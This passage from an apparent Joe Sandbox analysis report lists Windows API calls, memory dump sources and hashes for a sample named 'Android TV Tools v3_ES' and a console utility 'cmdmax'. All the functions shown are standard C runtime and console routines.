                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                        • API String ID: 2238633743-4044615076
                        • Opcode ID: 867288824564334f3619757082f0dbebd42382dfb6261171ba2e325262ccdaa6
                        • Instruction ID: de74ab1525ea14d435eb6cc6dd20cd1ff6ab2bca9f2c39baf57a699a0f35d6ad
                        • Opcode Fuzzy Hash: 867288824564334f3619757082f0dbebd42382dfb6261171ba2e325262ccdaa6
                        • Instruction Fuzzy Hash: C8017531B40201AFCB11DFF59C80A677EE9DA58744301483BB609E31A0D779D8159BAE
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                        • Instruction ID: 2d158c1009ae456f37a5d11eca89f62052bc5679d8e3b992de952646bde8a11f
                        • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                        • Instruction Fuzzy Hash: 79B16C3590030ADFDB15CF04C5D0AA9BBA1BB58318F14C1AED81A6F382D735EA52CB94
                        APIs (GetModuleFileNameA, then GetStdHandle and WriteFile together with the "Runtime Error!Program: " and "<program name unknown>" strings: this is the MSVC CRT's _NMSG_WRITE routine printing its runtime-error banner to stderr. The 000000F4 shown for GetStdHandle is the 8-bit immediate as pushed; sign-extended it is 0xFFFFFFF4 = STD_ERROR_HANDLE (-12))
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00408BEE
                        • GetStdHandle.KERNEL32(000000F4,0040D484,00000000,?,00000000,00000000), ref: 00408CC4
                        • WriteFile.KERNEL32(00000000), ref: 00408CCB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: File$HandleModuleNameWrite
                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $x@
                        • API String ID: 3784150691-2704448551
                        • Opcode ID: df2143502b701b13a0ead86e14fd4dc7c5c6fe193ade6b65076ebd06141f7b20
                        • Instruction ID: 38fcf710f914df7c8948c21a669aeb727ca3293119fd2f73b68b07cef56c78a5
                        • Opcode Fuzzy Hash: df2143502b701b13a0ead86e14fd4dc7c5c6fe193ade6b65076ebd06141f7b20
                        • Instruction Fuzzy Hash: DC31C772A012086EEB20AB61CD49F9B777CEB45314F50047BF584F61C0DA78A9958F6D
                        APIs
                        • LCMapStringW.KERNEL32(00000000,00000100,0040D514,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0040BE62
                        • LCMapStringA.KERNEL32(00000000,00000100,0040D510,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0040BE7E
                        • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0040BEC7
                        • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0040BEFF
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0040BF57
                        • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0040BF6D
                        • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0040BFA0
                        • LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0040C008
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: String$ByteCharMultiWide
                        • String ID:
                        • API String ID: 352835431-0
                        • Opcode ID: eae2aa2bde7858584f9a91431d64d86d5fae59c2fa5213f05ca84d6fd01fc824
                        • Instruction ID: caf144f6782c282f1fb5cc2b4170338e13de84eb125e1eeb8fe7c591b5a57659
                        • Opcode Fuzzy Hash: eae2aa2bde7858584f9a91431d64d86d5fae59c2fa5213f05ca84d6fd01fc824
                        • Instruction Fuzzy Hash: B9513A71900209EFCF228F94CD45ADB7FB9FB48754F20412AF915B22A0D3398965DFA9
                        APIs
                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,004064C8), ref: 00408825
                        • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,004064C8), ref: 00408839
                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,004064C8), ref: 00408865
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004064C8), ref: 0040889D
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004064C8), ref: 004088BF
                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,004064C8), ref: 004088D8
                        • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,004064C8), ref: 004088EB
                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00408929
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                        • String ID:
                        • API String ID: 1823725401-0
                        • Opcode ID: 2128200c2dec99112e6e3d97e987e26460640e4f1291a272db4ce0cace52e8e4
                        • Instruction ID: eb6923129fc198a291aa4392daaae0253ef6126e5f38dd87825d6eb0f0d04450
                        • Opcode Fuzzy Hash: 2128200c2dec99112e6e3d97e987e26460640e4f1291a272db4ce0cace52e8e4
                        • Instruction Fuzzy Hash: 893137B38042155FD7203BB56E8483B769CEA49348B51453FF5C1F3381EE388C42926E
                        APIs
                        • GetStringTypeW.KERNEL32(00000001,0040D514,00000001,00000000,?,00000100,00000000,0040B53F,00000001,00000020,00000100,?,00000000), ref: 0040A682
                        • GetStringTypeA.KERNEL32(00000000,00000001,0040D510,00000001,00000000,?,00000100,00000000,0040B53F,00000001,00000020,00000100,?,00000000), ref: 0040A69C
                        • GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,0040B53F,00000001,00000020,00000100,?,00000000), ref: 0040A6D0
                        • MultiByteToWideChar.KERNEL32(0040B53F,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,0040B53F,00000001,00000020,00000100,?,00000000), ref: 0040A708
                        • MultiByteToWideChar.KERNEL32(0040B53F,00000001,00000100,00000020,?,00000100,?,00000100,00000000,0040B53F,00000001,00000020,00000100,?), ref: 0040A75E
                        • GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,0040B53F,00000001,00000020,00000100,?), ref: 0040A770
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: StringType$ByteCharMultiWide
                        • String ID:
                        • API String ID: 3852931651-0
                        • Opcode ID: 2eecb771c646a8312660574022f2fa4698ce1d4a762b91853752a18b02e08ce0
                        • Instruction ID: d8b8f3ae18008e25f8c65a2e95e7f3221f58a96c8a8c78502c253b54901eb93f
                        • Opcode Fuzzy Hash: 2eecb771c646a8312660574022f2fa4698ce1d4a762b91853752a18b02e08ce0
                        • Instruction Fuzzy Hash: E4416071900209AFCF209F94CC85EEF7FB9EB08754F108536F915A2290C339C9659BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f6300edd1b72ee42fb2a2c78bbbcfa209d2ba629295c382778fc1eb378479e2
                        • Instruction ID: e457cf3dc0a161c47f043460bd6a0560b05df537884281ffeb8cb34ae73c9f8f
                        • Opcode Fuzzy Hash: 4f6300edd1b72ee42fb2a2c78bbbcfa209d2ba629295c382778fc1eb378479e2
                        • Instruction Fuzzy Hash: 3121B33A900105EACF21DB94DE81AAF37B9EB44314F1002BBF511F22E0E3358949DBAC
                        APIs
                        • GetTickCount.KERNEL32 ref: 00404D10
                        • GetTickCount.KERNEL32 ref: 00404D19
                        • Sleep.KERNEL32(00000001,?,?,00404A76), ref: 00404D2B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: CountTick$Sleep
                        • String ID: vJ@
                        • API String ID: 4250438611-3547802607
                        • Opcode ID: 28b246be3bc00e080162425e568454d690fb55889d731836eae1020fd3b864f0
                        • Instruction ID: 49849d38280906807e8ee4edd28df9028b76a086347d3e99f882293cb68a1183
                        • Opcode Fuzzy Hash: 28b246be3bc00e080162425e568454d690fb55889d731836eae1020fd3b864f0
                        • Instruction Fuzzy Hash: 89E0E6B494410CEBD7009FD4E61965CBB74AF44305F1041A6E90DA2150C7759605966D
                        APIs
                        • GetModuleHandleA.KERNEL32(KERNEL32,00405EFC), ref: 00407F21
                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00407F31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: IsProcessorFeaturePresent$KERNEL32
                        • API String ID: 1646373207-3105848591
                        • Opcode ID: 801503ef7e27cf9a43a024029164bff861d2c6805bca75d3ab28725c527fc555
                        • Instruction ID: e56adbcfc5baa1e8a41b4ee712c6b816f41ba93bc4bb42817cd1dab545e2ce80
                        • Opcode Fuzzy Hash: 801503ef7e27cf9a43a024029164bff861d2c6805bca75d3ab28725c527fc555
                        • Instruction Fuzzy Hash: 5CC01230FCC30267DA202BF24D09B1628081B40B42F2040F6A209F60D4CE78E80A802E
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000000,00000000,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B9D6
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B9E9
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,00406910,00000000,?,00000000,?), ref: 0040BA35
                        • CompareStringW.KERNEL32(?,004055BA,00000000,00000000,?,00000000,?,00000000,?,00406910,00000000,?,00000000,?), ref: 0040BA4D
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$CompareString
                        • String ID:
                        • API String ID: 376665442-0
                        • Opcode ID: e230329e4d0f1b617e8e9b9b07688b33fe91b266f24df33c89f9663b5fb6963c
                        • Instruction ID: 70f0504ceda5a75237d31f75ca127f3a46736c60405e54fa0e2596185df07c21
                        • Opcode Fuzzy Hash: e230329e4d0f1b617e8e9b9b07688b33fe91b266f24df33c89f9663b5fb6963c
                        • Instruction Fuzzy Hash: 8A21E632D00249ABCF219F848D45ADE7FB5FB48360F10812AFA14721A0D3369A619B98
                        APIs
                        • GetCPInfo.KERNEL32(?,00000000), ref: 0040B4B4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: Info
                        • String ID: $
                        • API String ID: 1807457897-3032137957
                        • Opcode ID: b27c5241f401bb9353d1679f267d54306c1b93cc1f0b37af77394cc5f842b60e
                        • Instruction ID: 3ed02c847eb8ff4f8ce161b6e6d196eebb5d09d3f5d5ded90353173e0599949d
                        • Opcode Fuzzy Hash: b27c5241f401bb9353d1679f267d54306c1b93cc1f0b37af77394cc5f842b60e
                        • Instruction Fuzzy Hash: 90415A3100425C2AEB128794DD9ABF77F99EB05708F1808F6D545E62D2C3794904EBFE

                        Execution Graph

                        Execution Coverage: 9.5%
                        Dynamic/Decrypted Code Coverage: 0%
                        Signature Coverage: 0%
                        Total number of Nodes: 436
                        Total number of Limit Nodes: 4
                        execution_graph: rendered call graph of the analysed sample (interactive graph; the raw node address and edge list is not reproduced here)

                        Callgraph

                        • Call graph of the module: 109 functions (Function_00401000 through Function_004053A0) with caller-to-callee edges; the rendered graph is not reproduced.

                        Control-flow Graph

                        APIs
                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 004010EB
                        • GetProcAddress.KERNEL32(00000000), ref: 004010F2
                        • GetStdHandle.KERNEL32(000000F5), ref: 00401116
                        • GetLargestConsoleWindowSize.KERNEL32(00000001), ref: 0040112D
                        • ExitProcess.KERNEL32 ref: 0040128B
                        • GetConsoleWindow.KERNELBASE(00000000,?,?,00000000,00000000,00000001), ref: 004012EF
                        • SetWindowPos.USER32(00000000), ref: 004012F6
                        • SetConsoleScreenBufferSize.KERNELBASE(00000007,8U), ref: 00401304
                        • SetConsoleWindowInfo.KERNELBASE(00000007,00000001,00000000), ref: 00401314
                        • SetConsoleScreenBufferSize.KERNELBASE(00000007,8U), ref: 00401322
                        • SetConsoleWindowInfo.KERNELBASE(00000007,00000001,00000000), ref: 00401332
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: Console$Window$Size$BufferHandleInfoScreen$AddressExitLargestModuleProcProcess
                        • String ID: %d %d %d %d %d %d$8U$CMDMAX_DEBUG$GetConsoleWindow$Usage: cmdmax [<pos_x> <pos_y> <win_w> <win_h> <buf_w> <buf_h>] pos_x, pos_y are in pixels win_w, win_h, buf_w, buf_h are in characters buf_w, buf_h must be greater or equal to win_w, win_h if both pos_x, pos_y are set to letter 'n'$kernel32.dll
                        • API String ID: 3954929148-753699543
                        • Opcode ID: 51c1bba1868696b56766017a525fd275070f8669f06dd8a5ee0a9d837f02c277
                        • Instruction ID: 8c665b8b8e7dd296a86b3b68ad36f009cdc48b0ece15f37bffc1b1e9df652cec
                        • Opcode Fuzzy Hash: 51c1bba1868696b56766017a525fd275070f8669f06dd8a5ee0a9d837f02c277
                        • Instruction Fuzzy Hash: 5F815275D00208AADB00DFE4D98AFBF77B8AF08715F104066F904FB2A1E7789A55C75A

                        Control-flow Graph

                        • Control-flow graph of function 00404140 (basic blocks 404140-40442c; rendering not reproduced). Blocks call CompareStringA, CompareStringW, GetCPInfo and MultiByteToWideChar, and the subroutines 403ea0, 404430 and 404b20.
                        APIs
                        • CompareStringA.KERNELBASE(00000000,00000000,00407E20,00000001,00407E20,00000001,00550D38,?,?,FFFFFFFE,?,FFFFFFFE), ref: 00404162
                        • CompareStringW.KERNEL32(00000000,00000000,00407E24,00000001,00407E24,00000001,?,?,?,?,0040129B,CMDMAX_DEBUG), ref: 004041A2
                        • CompareStringA.KERNEL32(?,?,?,?,?,?,00550D38,?,?,FFFFFFFE,?,FFFFFFFE), ref: 004041FB
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: CompareString
                        • String ID:
                        • API String ID: 1825529933-0
                        • Opcode ID: 1ff1008ee3a4a55d8727752ad5fe31d2fa36966b366071291e4c568b1e8beb1f
                        • Instruction ID: e767498d96deb41678ceb7339b19bbc0015ffd8f8e65b5060bc0486a620b20b8
                        • Opcode Fuzzy Hash: 1ff1008ee3a4a55d8727752ad5fe31d2fa36966b366071291e4c568b1e8beb1f
                        • Instruction Fuzzy Hash: FA912BB27043006BD7209B95EC85B6BB7A8D7C5365F44047FFB40E6280D27EE94987A7

                        Control-flow Graph

                        • Control-flow graph of function 00403490 (basic blocks 403490-403662; rendering not reproduced). Blocks call GetStartupInfoA, GetStdHandle, GetFileType (twice) and SetHandleCount, and the subroutines 403ea0 and 401880.
                        APIs
                        • GetStartupInfoA.KERNEL32(?), ref: 004034F8
                        • GetFileType.KERNEL32(00000000), ref: 004035A6
                        • GetStdHandle.KERNEL32(FFFFFFF6), ref: 0040360E
                        • GetFileType.KERNELBASE(00000000), ref: 00403618
                        • SetHandleCount.KERNEL32(00000020), ref: 00403655
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: FileHandleType$CountInfoStartup
                        • String ID: @
                        • API String ID: 1710529072-2766056989
                        • Opcode ID: 63df62efcc3922071b0c15ba09ff141fc4bde9c6b434e268c60b1111de638fc9
                        • Instruction ID: 372a2bf32b0bdc82c37bf4d41fc824613e188a480a206bcbb4d6fa6d6a21597a
                        • Opcode Fuzzy Hash: 63df62efcc3922071b0c15ba09ff141fc4bde9c6b434e268c60b1111de638fc9
                        • Instruction Fuzzy Hash: 595122719042449BD7318F38CE8471A7FA8AB02325F18467ED895AB3E1D738D946C79A

                        Control-flow Graph

                        APIs
                        • GetVersion.KERNEL32 ref: 00401796
                          • Part of subcall function 00403670: HeapCreate.KERNELBASE(00000001,00001000,00000000,004017CC), ref: 00403679
                          • Part of subcall function 00403490: GetStartupInfoA.KERNEL32(?), ref: 004034F8
                          • Part of subcall function 00403490: GetFileType.KERNEL32(00000000), ref: 004035A6
                        • GetCommandLineA.KERNEL32 ref: 004017DD
                          • Part of subcall function 00403020: GetEnvironmentStringsW.KERNEL32 ref: 00403036
                          • Part of subcall function 00403020: GetEnvironmentStringsW.KERNEL32 ref: 0040308F
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
